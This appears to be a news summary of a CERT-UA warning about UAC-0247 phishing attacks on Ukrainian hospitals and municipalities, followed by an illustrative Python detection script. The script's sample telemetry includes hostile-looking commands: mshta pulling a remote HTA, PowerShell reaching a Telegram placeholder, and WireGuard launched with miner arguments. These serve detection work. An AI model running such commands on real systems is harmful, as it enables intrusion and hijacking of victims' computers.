
Ukraine Warns of Surge in Cyberattacks on Hospitals, Local Governments by UAC-0247 Hackers
Why It Matters
The surge threatens the continuity of essential health and municipal services, potentially compromising patient care and public safety. It also illustrates how cyber‑crime can piggyback on wartime humanitarian narratives, raising the stakes for organizations operating in conflict zones.
Key Takeaways
- UAC-0247 phishing lures use humanitarian aid offers
- Malware chain employs shortcut files and Windows tools for remote code
- Custom backdoor AGINGFLY provides persistent control and data exfiltration
- Attackers also embed XMRIG miners, indicating financial motive
Pulse Analysis
The ongoing conflict in Ukraine has turned the digital battlefield into a critical front, with state‑aligned and criminal groups exploiting the chaos to strike essential services. Recent data from CERT‑UA shows a sharp rise in attacks between March and April 2026 targeting hospitals, emergency responders, and municipal administrations. By masquerading as humanitarian aid offers, the UAC‑0247 threat cluster leverages the heightened trust of war‑time relief efforts, turning ordinary phishing emails into gateways for sophisticated malware. This surge underscores how geopolitical instability can amplify cyber risk for civilian infrastructure.
UAC‑0247’s infection chain is deliberately layered. A phishing link delivers a compressed archive containing a malicious shortcut (LNK) that invokes Windows utilities such as mshta.exe to execute remote code. Subsequent stages drop custom loaders, inject code into legitimate processes like RuntimeBroker.exe, and establish encrypted reverse shells resembling ‘RAVENSHELL.’ Persistence is achieved with the C# backdoor AGINGFLY, which dynamically pulls command logic from remote servers, and a PowerShell helper called SILENTLOOP that fetches C2 addresses, sometimes via Telegram channels. The toolkit also includes credential‑stealing utilities (CHROMELEVATOR, ZAPIXDESK) and tunneling tools for lateral movement.
The breadth of the campaign has practical implications for Ukrainian and allied organizations. Beyond data theft, attackers have embedded XMRIG cryptocurrency miners in compromised WireGuard binaries, revealing a dual motive of financial gain. CERT‑UA advises disabling high‑risk file types (LNK, HTA, JavaScript) and restricting native Windows tools like PowerShell and mshta.exe, while emphasizing network segmentation and multi‑factor authentication to curb lateral spread. As the conflict endures, the episode serves as a warning that cyber‑espionage and profit‑driven crime will continue to converge on critical public services worldwide.
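As an added example that is not from the article or from CERT-UA, the following Python turns the chain described above into detection heuristics run over process-creation telemetry. The record fields, the sample events and the hostnames are constructed for this example, and the patterns are illustrative assumptions rather than published signatures.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:  # minimal process-creation record (Sysmon EID 1 fields, simplified)
    parent_image: str
    image: str
    command_line: str

def _base(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

# Heuristics modelled on the chain CERT-UA describes; patterns are illustrative assumptions, not vendor signatures.
RULES = {
    # LNK lure opened in Explorer hands execution to mshta.exe
    "explorer_spawns_mshta": lambda e: _base(e.parent_image) == "explorer.exe"
    and _base(e.image) == "mshta.exe",
    # mshta.exe fetching its HTA from a remote location (remote code stage)
    "mshta_remote_content": lambda e: _base(e.image) == "mshta.exe"
    and re.search(r"https?://", e.command_line, re.I) is not None,
    # PowerShell helper resolving C2 via Telegram (SILENTLOOP behaviour)
    "powershell_telegram_lookup": lambda e: _base(e.image) == "powershell.exe"
    and re.search(r"\bt\.me/|api\.telegram\.org", e.command_line, re.I) is not None,
    # VPN binary started with miner arguments (trojanized WireGuard + XMRIG)
    "wireguard_with_miner_args": lambda e: _base(e.image).startswith("wireguard")
    and re.search(r"stratum\+tcp://|--donate-level", e.command_line, re.I) is not None,
}

def scan(events):
    """Return (rule_name, image) for every event that trips a rule."""
    return [(name, _base(e.image)) for e in events
            for name, check in RULES.items() if check(e)]

# Constructed sample telemetry; hosts are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe https://aid-offer.example.invalid/form.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -Command Invoke-WebRequest https://t.me/s/PLACEHOLDER_CHANNEL"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -Command Get-ChildItem C:\Reports"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Program Files\WireGuard\wireguard.exe",
              r"wireguard.exe /installtunnelservice C:\conf\wg0.conf"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Program Files\WireGuard\wireguard.exe",
              r"wireguard.exe -o stratum+tcp://pool.example.invalid:3333 --donate-level 1"),
]

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule:28} {image}")
```

The two benign events (an interactive PowerShell directory listing and a normal WireGuard service start) produce no hits, which is the false-positive check a practitioner would want before deploying rules like these.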